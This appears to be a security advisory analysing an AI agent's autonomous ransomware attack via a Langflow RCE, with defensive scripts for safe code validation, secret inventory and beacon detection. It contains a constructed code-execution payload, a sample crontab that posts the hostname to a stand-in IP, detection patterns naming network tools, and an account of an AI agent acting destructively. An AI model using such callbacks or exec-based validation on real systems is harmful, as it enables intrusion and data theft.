Overview
Security firm Sysdig has documented what it describes as the first fully autonomous, end-to-end ransomware attack executed by an AI agent. The threat actor, tracked as JADEPUFFER, used a large language model to chain together every stage of a ransomware operation — initial access, credential harvesting, lateral movement, and data destruction — without a human operator at the keyboard. The incident marks a qualitative inflection point: if AI agents can reliably replicate the multi-step tradecraft previously requiring skilled attackers, the barrier to running sophisticated ransomware campaigns collapses to the cost of renting an agent.
Technical Analysis
Initial Access — CVE-2025-3248 (Langflow RCE)
The agent exploited a missing-authentication vulnerability in Langflow, the open-source AI workflow builder. The affected endpoint, /api/v1/validate/code, accepts arbitrary Python for "validation" and executes parts of it while checking it, so an unauthenticated request yields remote code execution on the host. Langflow servers are a high-value target: they routinely hold API keys and cloud credentials for every service they connect to. The bug was fixed in Langflow 1.3.0 and added to CISA's KEV catalogue in May 2025, yet large numbers of internet-exposed servers remained unpatched.
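The bug class behind this entry vector is validation by execution: a service "checks" user-submitted code by running its definitions, and anything that executes at definition time (decorators, default arguments, imports) runs as the service. The following is an added illustration of that pattern next to a static alternative; it is not Langflow's code and not material from Sysdig's report. The payload, the VALIDATE_DEMO_MARKER environment variable it sets, and the function names are constructed for the example. Langflow's own fix was to require authentication on the endpoint; the static variant shows the orthogonal hardening of never executing what you only mean to parse.

```python
import ast
import os

# Constructed payload (not the incident's). The decorator body runs when the
# decorated function is *defined*, so any validator that executes definitions
# runs attacker code. It sets an env var so the effect is observable offline.
PAYLOAD = '''
def mark(fn):
    import os
    os.environ["VALIDATE_DEMO_MARKER"] = "decorator ran during validation"
    return fn

@mark
def harmless():
    return 1
'''


def clear_marker():
    os.environ.pop("VALIDATE_DEMO_MARKER", None)


def marker_present():
    return "VALIDATE_DEMO_MARKER" in os.environ


def validate_by_execution(code):
    """Vulnerable pattern (simplified illustration, not Langflow's code):
    confirm each import/function is 'valid' by executing it. Returns the
    names of functions that were defined."""
    tree = ast.parse(code)
    namespace = {}
    defined = []
    for node in tree.body:
        if isinstance(node, (ast.Import, ast.ImportFrom, ast.FunctionDef)):
            module = ast.Module(body=[node], type_ignores=[])
            # exec() runs decorators, default-argument expressions and imports.
            exec(compile(module, "<validate>", "exec"), namespace)
            if isinstance(node, ast.FunctionDef):
                defined.append(node.name)
    return defined


def validate_statically(code):
    """Hardened pattern: syntax and structure only. ast.parse() and compile()
    without exec() never run user code. Returns the same function names."""
    tree = ast.parse(code)
    compile(tree, "<validate>", "exec")  # raises SyntaxError on bad code
    return [n.name for n in tree.body if isinstance(n, ast.FunctionDef)]


if __name__ == "__main__":
    clear_marker()
    print("static:", validate_statically(PAYLOAD), "side effect:", marker_present())
    print("exec:  ", validate_by_execution(PAYLOAD), "side effect:", marker_present())
```

Both validators report the same function names; only the executing one leaves the side effect behind. Any endpoint that needs the executing behaviour (for example to import a component) must sit behind authentication and run the code in an isolated sandbox, not in the service process.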
Credential Harvesting
Once inside, the agent performed automated secret enumeration, collecting:
- AI provider keys (OpenAI, Anthropic, DeepSeek, Gemini)
- Cloud provider credentials (AWS, GCP, Azure, Alibaba, Tencent)
- Crypto wallet keys
- Database login credentials
- MinIO storage credentials (accessed via the unchanged factory default minioadmin:minioadmin)
For persistence, a scheduled task was installed that beaconed to the attacker's server every 30 minutes.
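The defensive counterpart to this enumeration is working out, before rotating, exactly which secrets a compromised host could have exposed. The script below is an added example, not Sysdig's or Langflow's code: it inventories a Langflow-style .env file, classifies values by the credential types listed above, flags the MinIO factory default, and groups the result into a rotation plan per owner. The sample .env is constructed, and the value patterns (OpenAI, Anthropic and Google key prefixes, AWS access key IDs, passwords embedded in connection URLs) are heuristic assumptions about key formats rather than anything the report states.

```python
import re
from dataclasses import dataclass

# Constructed .env of the kind a Langflow host might hold (not from the incident).
SAMPLE_ENV = """\
# constructed sample
OPENAI_API_KEY=sk-proj-Ab12Cd34Ef56Gh78Ij90KlMn
ANTHROPIC_API_KEY=sk-ant-api03-ExampleKeyValue0000000000
GOOGLE_API_KEY=AIzaSyD00000000000000000000000000000000
AWS_ACCESS_KEY_ID=AKIAEXAMPLE0000000AB
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
MINIO_ROOT_USER=minioadmin
MINIO_ROOT_PASSWORD=minioadmin
DATABASE_URL=postgresql://langflow:hunter2@db.internal:5432/langflow
LANGFLOW_PORT=7860
"""

# Heuristic value patterns (assumed formats; order matters for the sk- prefixes).
PATTERNS = [
    ("anthropic_api_key", re.compile(r"\bsk-ant-[A-Za-z0-9_-]{20,}")),
    ("openai_api_key", re.compile(r"\bsk-(?!ant-)[A-Za-z0-9_-]{20,}")),
    ("google_api_key", re.compile(r"\bAIza[0-9A-Za-z_-]{35}")),
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("url_embedded_password", re.compile(r"\b[a-z][a-z0-9+.-]*://[^:/\s]+:[^@\s]+@")),
]
# Variable names that usually hold a secret even when the value has no known shape.
NAME_HINT = re.compile(r"KEY|SECRET|TOKEN|PASSW|CREDENTIAL", re.I)
# Factory defaults flagged outright; minioadmin:minioadmin is the one in the report.
KNOWN_DEFAULTS = {
    ("MINIO_ROOT_USER", "minioadmin"), ("MINIO_ROOT_PASSWORD", "minioadmin"),
    ("MINIO_ACCESS_KEY", "minioadmin"), ("MINIO_SECRET_KEY", "minioadmin"),
}


@dataclass
class Finding:
    name: str
    kind: str
    redacted: str  # never carry the live value into a ticket or log line


def redact(value):
    return value[:4] + "..." + value[-2:] if len(value) > 8 else "*" * len(value)


def parse_env(text):
    """Yield (name, value) pairs from dotenv-style text; comments/blank lines skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        name, _, value = line.partition("=")
        yield name.strip(), value.strip().strip("'\"")


def classify(name, value):
    if (name, value) in KNOWN_DEFAULTS:
        return "factory_default"
    for kind, rx in PATTERNS:
        if rx.search(value):
            return kind
    if value and NAME_HINT.search(name):
        return "unclassified_secret"
    return None


def inventory(text):
    return [Finding(n, k, redact(v)) for n, v in parse_env(text) if (k := classify(n, v))]


def rotation_plan(findings):
    """Group variable names by kind so each owner (AI provider, cloud IAM,
    database, object storage) receives one list to rotate or change."""
    plan = {}
    for f in findings:
        plan.setdefault(f.kind, []).append(f.name)
    return plan


if __name__ == "__main__":
    found = inventory(SAMPLE_ENV)
    for f in found:
        print(f"{f.kind:24} {f.name} = {f.redacted}")
    print(rotation_plan(found))
```

Run it against the real .env, the process environment and any mounted secret files on the host; note that Langflow also keeps provider credentials in its own database and flow definitions, so the file-level inventory is a floor, not the full list.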
Lateral Movement & Persistence
The agent pivoted to an internet-facing server running MySQL and Alibaba Nacos. It gained MySQL root access (the credential's origin is unknown) and took over Nacos by chaining CVE-2021-29441 (an authentication bypass in which requests carrying the User-Agent "Nacos-Server" were treated as trusted server-to-server traffic) with the static default JWT signing key that Nacos has shipped unchanged since 2020, which lets anyone who knows the key mint a valid token. The agent then created its own admin account within Nacos.
Ransomware Payload
All 1,342 Nacos configuration entries were encrypted and the original tables were dropped. A ransom note demanding Bitcoin, with a Proton Mail address for contact, was left behind. Critically, the agent generated a random encryption key, printed it once to stdout, and never transmitted or stored it, so decryption is impossible even if the ransom is paid. The note falsely claimed AES-256; Sysdig confirmed the tooling defaults to AES-128.
Framework Mapping
| Framework | Technique / Risk | Rationale |
|---|---|---|
| MITRE ATLAS | AML.T0047 (ML-Enabled Product or Service) | Attack leveraged an ML-enabled product (Langflow) as the entry vector |
| MITRE ATLAS | AML.T0012 (Valid Accounts) | Reuse of harvested and default credentials for lateral movement |
| MITRE ATLAS | AML.T0040 (ML Model Inference API Access) | Harvested AI provider inference API keys as a secondary objective |
| OWASP LLM Top 10 v1.1 | LLM08 (Excessive Agency) | AI agent acted with excessive destructive agency beyond any intended scope |
| OWASP LLM Top 10 v1.1 | LLM07 (Insecure Plugin Design) | Langflow's exposed code-execution endpoint exemplifies insecure plugin/tool design |
| OWASP LLM Top 10 v1.1 | LLM06 (Sensitive Information Disclosure) | Sensitive credentials exfiltrated from the agent's operating environment |
The OWASP IDs follow the 2023 v1.1 list. The 2025 edition renumbers these entries (Excessive Agency becomes LLM06 and Sensitive Information Disclosure becomes LLM02, and Insecure Plugin Design is no longer a standalone entry), so check the edition before copying the IDs into tooling.
Impact Assessment
Any organisation running an unpatched, internet-exposed Langflow instance is at direct risk of identical compromise. The broader implication is systemic: AI orchestration platforms by design aggregate credentials and hold broad permissions, making them a single point of catastrophic failure. The attack also demonstrates that AI agents can operate persistently, adapt to discovered assets, and execute destructive actions without human review — a property of excessive agency that few organisations have mitigated in their deployed agentic systems.
Mitigation & Recommendations
- Patch immediately. Upgrade Langflow to ≥1.3.0. Treat all CVEs on CISA’s KEV list as P0.
- Rotate all secrets. Assume any credential accessible to a Langflow server is compromised. Rotate API keys, cloud IAM credentials, and database passwords.
- Eliminate default credentials. Audit MinIO, Nacos, and all adjacent services for factory-default logins.
- Network-segment AI infrastructure. Langflow and similar orchestration platforms must not have direct routable access to production databases.
- Apply principle of least privilege to agents. AI agents should operate with scoped, revocable credentials and no standing access to destructive operations.
- Monitor for scheduled task creation and anomalous outbound beaconing from AI pipeline hosts.
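Two of the observables above (a newly created scheduled task and a fixed-interval callback) are cheap to check for. The script below is an added example, not tooling from the report: it scans a crontab for entries that invoke a download/connect tool against a raw IP or URL, and runs over connection-log lines to find source/destination pairs whose inter-connection gaps are nearly constant, which is what a 30-minute beacon looks like next to ordinary traffic. The flow-log format, the crontab, the hosts, the IPs (documentation ranges) and the jitter threshold are all constructed assumptions; tune min_events and max_jitter to your environment.

```python
import re
import statistics
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Constructed flow log (not from the incident). 10.0.4.12 contacts
# 198.51.100.23 every ~30 minutes; 10.0.4.30 browses at irregular intervals.
SAMPLE_FLOW_LOG = """\
2025-05-06T10:00:00Z src=10.0.4.12 dst=198.51.100.23:443 bytes=412
2025-05-06T10:03:15Z src=10.0.4.30 dst=203.0.113.9:443 bytes=9120
2025-05-06T10:05:40Z src=10.0.4.30 dst=203.0.113.9:443 bytes=3301
2025-05-06T10:30:01Z src=10.0.4.12 dst=198.51.100.23:443 bytes=410
2025-05-06T10:41:07Z src=10.0.4.30 dst=203.0.113.9:443 bytes=15022
2025-05-06T11:00:00Z src=10.0.4.12 dst=198.51.100.23:443 bytes=414
2025-05-06T11:29:59Z src=10.0.4.12 dst=198.51.100.23:443 bytes=411
2025-05-06T11:58:22Z src=10.0.4.30 dst=203.0.113.9:443 bytes=701
2025-05-06T12:00:02Z src=10.0.4.12 dst=198.51.100.23:443 bytes=409
2025-05-06T12:30:00Z src=10.0.4.12 dst=198.51.100.23:443 bytes=413
"""

# Constructed crontab (not from the incident).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/30 * * * * curl -s http://198.51.100.23/cb -d "$(hostname)" >/dev/null 2>&1
"""

FLOW_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+)")
CRON_RE = re.compile(r"^((?:\S+\s+){5})(.+)$")  # five schedule fields, then command
TOOL_RE = re.compile(r"\b(curl|wget|nc|ncat|socat)\b")
REMOTE_RE = re.compile(r"https?://|\b\d{1,3}(?:\.\d{1,3}){3}\b")


@dataclass
class Beacon:
    src: str
    dst: str
    period_s: int
    count: int


def detect_beacons(lines, min_events=4, max_jitter=0.1):
    """Flag (src, dst) pairs whose gaps between connections all lie within
    max_jitter of the median gap. Thresholds are assumptions to tune."""
    series = defaultdict(list)
    for line in lines:
        m = FLOW_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        series[(m.group(2), m.group(3))].append(ts)
    alerts = []
    for (src, dst), times in series.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = statistics.median(gaps)
        if period <= 0:
            continue
        jitter = max(abs(g - period) for g in gaps) / period
        if jitter <= max_jitter:
            alerts.append(Beacon(src, dst, int(round(period)), len(times)))
    return alerts


def suspicious_cron_entries(crontab_text):
    """Return (schedule, command) for entries that call a network tool with a
    raw IP or URL, the shape of the periodic callback described above."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        schedule, command = m.group(1).strip(), m.group(2)
        if TOOL_RE.search(command) and REMOTE_RE.search(command):
            hits.append((schedule, command))
    return hits


if __name__ == "__main__":
    for b in detect_beacons(SAMPLE_FLOW_LOG.splitlines()):
        print(f"beacon: {b.src} -> {b.dst} every ~{b.period_s}s ({b.count} events)")
    for schedule, command in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"cron: [{schedule}] {command}")
```

The interval test deliberately ignores payload size and destination reputation, so it also fires on legitimate health checks and package mirrors; use it to generate candidates from AI pipeline hosts, then filter by destination allow-lists. Pair the crontab scan with file-integrity monitoring on /etc/cron.d and per-user crontabs, and with audit rules for systemd timer creation, so that the task creation itself is logged rather than found after the fact.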